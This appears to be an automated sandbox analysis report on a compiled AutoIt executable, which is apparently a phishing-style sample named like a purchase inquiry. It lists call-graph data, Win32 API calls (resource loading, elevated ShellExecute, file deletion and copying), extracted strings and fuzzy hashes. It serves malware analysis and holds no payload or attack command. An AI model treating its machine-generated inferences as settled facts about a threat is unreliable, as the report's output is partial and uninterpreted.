df7d2c 59 API calls 98352->98354 98354->98355 98355->98203 98355->98211 98357 df3ac2 LoadImageW RegisterClassExW 98356->98357 98358 e2d49c 98356->98358 99622 df3041 7 API calls 98357->99622 99623 df48fe LoadImageW EnumResourceNamesW 98358->99623 98361 e2d4a5 98362 df3b46 98363 df39e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98362->98363 98363->98219 98365 e350ed 98364->98365 98379 e00b55 98364->98379 98440 e00b65 Mailbox 98379->98440 99770 df9fbd 60 API calls 98379->99770 99771 e468bf 341 API calls 98379->99771 98442->98203 98443->98216 98445 df3d50 __write_nolock 98444->98445 98446 df7d2c 59 API calls 98445->98446 98451 df3eb6 Mailbox 98445->98451 98448 df3d82 98446->98448 98457 df3db8 Mailbox 98448->98457 98555 df7b52 98448->98555 98449 df7b52 59 API calls 98449->98457 98450 df7f41 59 API calls 98454 df3eaa 98450->98454 98451->98247 98452 df3e89 98452->98450 98452->98451 98453 df7f41 59 API calls 98453->98457 98455 df3f84 59 API calls 98454->98455 98455->98451 98456 df3f84 59 API calls 98456->98457 98457->98449 98457->98451 98457->98452 98457->98453 98457->98456 98558 df4d13 98458->98558 98463 df4f68 LoadLibraryExW 98568 df4cc8 98463->98568 98464 e2dd0f 98466 df4faa 84 API calls 98464->98466 98468 e2dd16 98466->98468 98470 df4cc8 3 API calls 98468->98470 98471 e2dd1e 98470->98471 98594 df506b 98471->98594 98472 df4f8f 98472->98471 98473 df4f9b 98472->98473 98475 df4faa 84 API calls 98473->98475 98477 df37e6 98475->98477 98477->98254 98477->98255 98479 e2dd45 98602 df5027 98479->98602 98481 e2dd52 98483 e10ff6 Mailbox 59 API calls 98482->98483 98484 df380d 98483->98484 98484->98268 98486 df862b 98485->98486 98488 df8652 98486->98488 99029 df8b13 69 API calls Mailbox 98486->99029 98488->98272 98490 df3eec 98489->98490 98491 df3f05 98489->98491 98492 df81a7 59 API calls 98490->98492 98493 df7d2c 59 API calls 98491->98493 98494 df388b 98492->98494 98493->98494 98495 e1313d 98494->98495 98496 e131be 98495->98496 98497 e13149 98495->98497 99032 e131d0 60 
API calls 3 library calls 98496->99032 98504 e1316e 98497->98504 99030 e18d68 58 API calls __getptd_noexit 98497->99030 98499 e131cb 98499->98293 98501 e13155 99031 e18ff6 9 API calls strtoxl 98501->99031 98503 e13160 98503->98293 98504->98293 98506 e2f5a5 98505->98506 98508 df9057 98505->98508 98506->98508 99033 df8d3b 59 API calls Mailbox 98506->99033 98509 df9158 98508->98509 98510 df91a0 98508->98510 98513 df915f 98508->98513 98512 e10ff6 Mailbox 59 API calls 98509->98512 98511 df9e9c 60 API calls 98510->98511 98511->98513 98512->98513 98513->98321 98515 df5045 85 API calls 98514->98515 98516 e59854 98515->98516 99034 e599be 98516->99034 98519 df506b 74 API calls 98520 e59881 98519->98520 98521 df506b 74 API calls 98520->98521 98522 e59891 98521->98522 98523 df506b 74 API calls 98522->98523 98524 e598ac 98523->98524 98525 df506b 74 API calls 98524->98525 98526 e598c7 98525->98526 98527 df5045 85 API calls 98526->98527 98528 e598de 98527->98528 98529 e1594c std::exception::_Copy_str 58 API calls 98528->98529 98530 e598e5 98529->98530 98531 e1594c std::exception::_Copy_str 58 API calls 98530->98531 98532 e598ef 98531->98532 98533 df506b 74 API calls 98532->98533 98534 e59903 98533->98534 98535 e59393 GetSystemTimeAsFileTime 98534->98535 98536 e59916 98535->98536 98537 e59940 98536->98537 98538 e5992b 98536->98538 98539 e599a5 98537->98539 98540 e59946 98537->98540 98541 e12f95 _free 58 API calls 98538->98541 98544 e12f95 _free 58 API calls 98539->98544 99040 e58d90 98540->99040 98542 e59931 98541->98542 98545 e12f95 _free 58 API calls 98542->98545 98547 e2d3c1 98544->98547 98545->98547 98547->98258 98549 df4faa 98547->98549 98548 e12f95 _free 58 API calls 98548->98547 98550 df4fb4 98549->98550 98552 df4fbb 98549->98552 98551 e155d6 __fcloseall 83 API calls 98550->98551 98551->98552 98553 df4fdb FreeLibrary 98552->98553 98554 df4fca 98552->98554 98553->98554 98554->98258 98556 df7faf 59 API calls 98555->98556 98557 df7b5d 98556->98557 98557->98448 98607 df4d61 
98558->98607 98561 df4d61 2 API calls 98564 df4d3a 98561->98564 98562 df4d4a FreeLibrary 98563 df4d53 98562->98563 98565 e1548b 98563->98565 98564->98562 98564->98563 98611 e154a0 98565->98611 98567 df4f5c 98567->98463 98567->98464 98769 df4d94 98568->98769 98571 df4ced 98572 df4cff FreeLibrary 98571->98572 98573 df4d08 98571->98573 98572->98573 98575 df4dd0 98573->98575 98574 df4d94 2 API calls 98574->98571 98576 e10ff6 Mailbox 59 API calls 98575->98576 98577 df4de5 98576->98577 98578 df538e 59 API calls 98577->98578 98579 df4df1 _memmove 98578->98579 98580 df4e2c 98579->98580 98582 df4ee9 98579->98582 98583 df4f21 98579->98583 98581 df5027 69 API calls 98580->98581 98590 df4e35 98581->98590 98773 df4fe9 CreateStreamOnHGlobal 98582->98773 98784 e59ba5 95 API calls 98583->98784 98586 df506b 74 API calls 98586->98590 98588 e2dcd0 98589 df5045 85 API calls 98588->98589 98591 e2dce4 98589->98591 98590->98586 98590->98588 98593 df4ec9 98590->98593 98779 df5045 98590->98779 98592 df506b 74 API calls 98591->98592 98592->98593 98593->98472 98595 df507d 98594->98595 98596 e2ddf6 98594->98596 98808 e15812 98595->98808 98599 e59393 99006 e591e9 98599->99006 98601 e593a9 98601->98479 98603 df5036 98602->98603 98604 e2ddb9 98602->98604 99011 e15e90 98603->99011 98606 df503e 98606->98481 98608 df4d2e 98607->98608 98609 df4d6a LoadLibraryA 98607->98609 98608->98561 98608->98564 98609->98608 98610 df4d7b GetProcAddress 98609->98610 98610->98608 98614 e154ac __mtinitlocknum 98611->98614 98612 e154bf 98660 e18d68 58 API calls __getptd_noexit 98612->98660 98614->98612 98616 e154f0 98614->98616 98615 e154c4 98661 e18ff6 9 API calls strtoxl 98615->98661 98630 e20738 98616->98630 98619 e154f5 98620 e1550b 98619->98620 98621 e154fe 98619->98621 98623 e15535 98620->98623 98624 e15515 98620->98624 98662 e18d68 58 API calls __getptd_noexit 98621->98662 98645 e20857 98623->98645 98663 e18d68 58 API calls __getptd_noexit 98624->98663 98627 e154cf __mtinitlocknum @_EH4_CallFilterFunc@8 
Execution graph: the call-graph edge list exported with the report is not reproduced here. What it records is the node structure of the AutoIt runtime and its statically linked CRT: file and stream helpers (__lock, __wsopen_nolock, __read_nolock, __write_nolock, __close_nolock, __lseeki64_nolock, __chsize_nolock, __fcloseall, _memmove) and the Win32 APIs they reach: CreateFileW resolved through GetModuleHandleW/GetProcAddress, GetFileType, ReadFile, WriteFile, ReadConsoleW, WriteConsoleW, GetConsoleMode, GetConsoleCP, MultiByteToWideChar, WideCharToMultiByte, SetFilePointerEx, CloseHandle, FindCloseChangeNotification, LoadLibraryA/GetProcAddress, FindResourceExW/LoadResource/SizeofResource/LockResource, GetSystemTimeAsFileTime, GetLongPathNameW, SetCurrentDirectoryW, GetStringTypeW, GetStdHandle, OleInitialize, RegisterWindowMessageW, CreateThread, EnterCriticalSection/LeaveCriticalSection and InitializeCriticalSectionAndSpinCount.

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DF3B7A
                                          • IsDebuggerPresent.KERNEL32 ref: 00DF3B8C
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EB62F8,00EB62E0,?,?), ref: 00DF3BFD
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                            • Part of subcall function 00E00A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DF3C26,00EB62F8,?,?,?), ref: 00E00ACE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DF3C81
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EA93F0,00000010), ref: 00E2D4BC
                                          • SetCurrentDirectoryW.KERNEL32(?,00EB62F8,?,?,?), ref: 00E2D4F4
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EA5D40,00EB62F8,?,?,?), ref: 00E2D57A
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E2D581
                                            • Part of subcall function 00DF3A58: GetSysColorBrush.USER32(0000000F), ref: 00DF3A62
                                            • Part of subcall function 00DF3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DF3A71
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(00000063), ref: 00DF3A88
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(000000A4), ref: 00DF3A9A
                                            • Part of subcall function 00DF3A58: LoadIconW.USER32(000000A2), ref: 00DF3AAC
                                            • Part of subcall function 00DF3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DF3AD2
                                            • Part of subcall function 00DF3A58: RegisterClassExW.USER32(?), ref: 00DF3B28
                                            • Part of subcall function 00DF39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DF3A15
                                            • Part of subcall function 00DF39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DF3A36
                                            • Part of subcall function 00DF39E7: ShowWindow.USER32(00000000,?,?), ref: 00DF3A4A
                                            • Part of subcall function 00DF39E7: ShowWindow.USER32(00000000,?,?), ref: 00DF3A53
                                            • Part of subcall function 00DF43DB: _memset.LIBCMT ref: 00DF4401
                                            • Part of subcall function 00DF43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF44A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%
                                          • API String ID: 529118366-3343222573
                                          • Opcode ID: d68447309c913389c57e5c9729b0de24e98262b80822ccccbf8ee58c201c7d2a
                                          • Instruction ID: 0cee6cac7c26cb722f60352239334b2e35d39323c22794460cadcbd4230fc79c
                                          • Opcode Fuzzy Hash: d68447309c913389c57e5c9729b0de24e98262b80822ccccbf8ee58c201c7d2a
                                          • Instruction Fuzzy Hash: 9151143090824CAEDF11EBB5EC06AFE7B78EF45300B068165F655B61A2CA749A49CB31

                                          Control-flow Graph

                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00DF4B2B
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • GetCurrentProcess.KERNEL32(?,00E7FAEC,00000000,00000000,?), ref: 00DF4BF8
                                          • IsWow64Process.KERNEL32(00000000), ref: 00DF4BFF
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00DF4C45
                                          • FreeLibrary.KERNEL32(00000000), ref: 00DF4C50
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DF4C81
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00DF4C8D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: fba8688f37c2465e4ce838f06243501456e4f1321fa12a4a3cad70f5bf4d01e9
                                          • Instruction ID: db1bccb7f51c17ff5cd911aeda7ae910d4b28c6e3149314c5e6aa5a12b093a7e
                                          • Opcode Fuzzy Hash: fba8688f37c2465e4ce838f06243501456e4f1321fa12a4a3cad70f5bf4d01e9
                                          • Instruction Fuzzy Hash: 7291C53154E7C8DEC731CB6894611BBFFE4AF25310B499D9ED1CB93A42D220E948C729

                                          Control-flow Graph

                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4DAC5
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E4DAFB
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E4DB0C
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E4DB8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: ,,$DllGetClassObject
                                          • API String ID: 753597075-2867008933
                                          • Opcode ID: aee727456d249ea8c336348e3ab238131e4ef9fcecf4029827d6e91c12306d71
                                          • Instruction ID: 2ccad1c47b9e91d7074f0442bd2e620acc03468ae4ccb4e0d2fc11ea4fc55a92
                                          • Opcode Fuzzy Hash: aee727456d249ea8c336348e3ab238131e4ef9fcecf4029827d6e91c12306d71
                                          • Instruction Fuzzy Hash: FD417EB1604208EFDB15CF55DC84A9ABBA9EF48310F1590AAED09AF206D7B1DD44CBA0

                                          Control-flow Graph

                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DF4EEE,?,?,00000000,00000000), ref: 00DF4FF9
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DF4EEE,?,?,00000000,00000000), ref: 00DF5010
                                          • LoadResource.KERNEL32(?,00000000,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F), ref: 00E2DD60
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F), ref: 00E2DD75
                                          • LockResource.KERNEL32(00DF4EEE,?,?,00DF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00DF4F8F,00000000), ref: 00E2DD88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 99e1ebe2d7a7e9b5842e5fb0bbc11ac6fde5faf16d23072ba8d426f5cc2800f9
                                          • Instruction ID: 6d7245792d74fa947995c5ac8f692fb757e9844dfd1a56449d48a2c4bf049dc5
                                          • Opcode Fuzzy Hash: 99e1ebe2d7a7e9b5842e5fb0bbc11ac6fde5faf16d23072ba8d426f5cc2800f9
                                          • Instruction Fuzzy Hash: 45115E75200704AFD7218B66EC58F677BB9EBC9B12F248168FA09D6260DF61EC448670
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: pr$%
                                          • API String ID: 3964851224-1730865138
                                          • Opcode ID: 47cfdda7eee021bcb7f9e4fc9746ec9cbf16b5811f65fbfd584f83d8684eed42
                                          • Instruction ID: 3e8f79881e67296101e0a8533609f7760a65894441090bfa7f72b00f964d2844
                                          • Opcode Fuzzy Hash: 47cfdda7eee021bcb7f9e4fc9746ec9cbf16b5811f65fbfd584f83d8684eed42
                                          • Instruction Fuzzy Hash: 2C925B706083418FD724DF14C484B6ABBE1FF88304F19996DE98AAB391D775EC85CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                          • API String ID: 0-3952547859
                                          • Opcode ID: e3713f666d2943771ae0db02d5acbcf706316aadb939e888e0f32d647f8ad727
                                          • Instruction ID: 1735e653afcda8c3818ff6d7ecd242a33185cd44a4f74186b1754142071b5442
                                          • Opcode Fuzzy Hash: e3713f666d2943771ae0db02d5acbcf706316aadb939e888e0f32d647f8ad727
                                          • Instruction Fuzzy Hash: 45A26D75A04209CFCB14CF58C480ABAB7B1FF48304F2AC169EA56AB361D775ED45CBA1
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00E2E7C1), ref: 00E546A6
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00E546B7
                                          • FindClose.KERNEL32(00000000), ref: 00E546C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: c94fc09f09bb4c27afa833d3fa5af518f73f80a210495798f5413f8caecbc24b
                                          • Instruction ID: 01d30e8fe5aff4435c3c31ca21d27ef6f0ba9b9585efe005e5388a3f8bcb5b16
                                          • Opcode Fuzzy Hash: c94fc09f09bb4c27afa833d3fa5af518f73f80a210495798f5413f8caecbc24b
                                          • Instruction Fuzzy Hash: F7E0D8714144006F4210A738EC4D8EA775C9F0633AF100B15FD39E20F0E7F059D88695
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E00BBB
                                          • timeGetTime.WINMM ref: 00E00E76
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E00FB3
                                          • TranslateMessage.USER32(?), ref: 00E00FC7
                                          • DispatchMessageW.USER32(?), ref: 00E00FD5
                                          • Sleep.KERNEL32(0000000A), ref: 00E00FDF
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00E0105A
                                          • DestroyWindow.USER32 ref: 00E01066
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E01080
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00E352AD
                                          • TranslateMessage.USER32(?), ref: 00E3608A
                                          • DispatchMessageW.USER32(?), ref: 00E36098
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E360AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                          • API String ID: 4003667617-1825247661
                                          • Opcode ID: 4e83de12c02549a9ef6360133dc406b714755b6497f71706ed4dab7c8b595f26
                                          • Instruction ID: b54ea38d008363387ce047a5feb92998066b9cf281a5258e95fdea86079c3d3c
                                          • Opcode Fuzzy Hash: 4e83de12c02549a9ef6360133dc406b714755b6497f71706ed4dab7c8b595f26
                                          • Instruction Fuzzy Hash: 36B2C471608741DFD728DF24C888BAABBE5FF84308F14591DE599A7391CB70E884CB92

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E591E9: __time64.LIBCMT ref: 00E591F3
                                            • Part of subcall function 00DF5045: _fseek.LIBCMT ref: 00DF505D
                                          • __wsplitpath.LIBCMT ref: 00E594BE
                                            • Part of subcall function 00E1432E: __wsplitpath_helper.LIBCMT ref: 00E1436E
                                          • _wcscpy.LIBCMT ref: 00E594D1
                                          • _wcscat.LIBCMT ref: 00E594E4
                                          • __wsplitpath.LIBCMT ref: 00E59509
                                          • _wcscat.LIBCMT ref: 00E5951F
                                          • _wcscat.LIBCMT ref: 00E59532
                                            • Part of subcall function 00E5922F: _memmove.LIBCMT ref: 00E59268
                                            • Part of subcall function 00E5922F: _memmove.LIBCMT ref: 00E59277
                                          • _wcscmp.LIBCMT ref: 00E59479
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AAE
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AC1
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E596DC
                                          • _wcsncpy.LIBCMT ref: 00E5974F
                                          • DeleteFileW.KERNEL32(?,?), ref: 00E59785
                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E5979B
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E597AC
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E597BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: bf40a66aa52d0b290a5ccdd42fc967149602fa62206a1a17f6d4d1cb9872babb
                                          • Instruction ID: 4c1b051a79e01075783f363b29a66e0ca4774c176cd7ce8103434693a81df73d
                                          • Opcode Fuzzy Hash: bf40a66aa52d0b290a5ccdd42fc967149602fa62206a1a17f6d4d1cb9872babb
                                          • Instruction Fuzzy Hash: 1FC13CB1900219AEDF11DF95CC85EDEB7BDEF49300F0054AAF609F6152EB709A888F65

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3074
                                          • RegisterClassExW.USER32(00000030), ref: 00DF309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DF30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 278d9be07f36fc01abbf2d48195c802c6959621782ee24325b41bdff9c8765e3
                                          • Instruction ID: ffa318119743dbc40c21a4d5835a266dcc4353b6588ed9b76d458e4f1553b04c
                                          • Opcode Fuzzy Hash: 278d9be07f36fc01abbf2d48195c802c6959621782ee24325b41bdff9c8765e3
                                          • Instruction Fuzzy Hash: E2313871845309EFDB01CFA5EC85ADABBF4FB09310F10862AE554B62A0D3B90589CF90

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3074
